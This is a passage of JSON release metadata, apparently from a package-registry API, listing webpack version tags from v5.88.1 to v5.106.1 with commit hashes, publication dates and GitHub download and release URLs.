ack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.88.2/manifests"},{"name":"v5.88.1","sha":"6be4065ade1e252c1d8dcba4af0f43e32af1bdc1","kind":"tag","published_at":"2023-06-28T16:34:37.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.1","tag_url":"https://repos.